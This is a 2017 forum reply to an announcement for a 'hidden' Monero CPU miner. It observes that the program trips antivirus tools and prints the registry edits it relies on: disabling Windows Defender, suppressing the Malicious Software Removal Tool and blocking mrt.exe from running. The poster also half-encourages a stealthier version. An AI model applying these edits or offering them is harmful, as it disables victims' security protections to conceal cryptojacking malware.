Post
Topic
Board Mining (Altcoins)
Re: [ANN]StealthMiner v1.1 BEST CPU Miner for Monero-1 Click Setup-HIDDEN-MORE COINS
by
Eyedol-X
on 30/05/2017, 06:55:33 UTC
Interesting concept but this program pretty much will set off every major antivirus program out there and separately requires the computer it runs on to disable Windows Defender and the Malicious Software Removal Tool... but you knew that already Wink

Now if you could accomplish this without all that, you could really have something until someone out there uses your program in the next virus, then everyone will detect it again.

Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT]
"DontOfferThroughWUAU"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"DisallowRun"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun]
"1"="mrt.exe"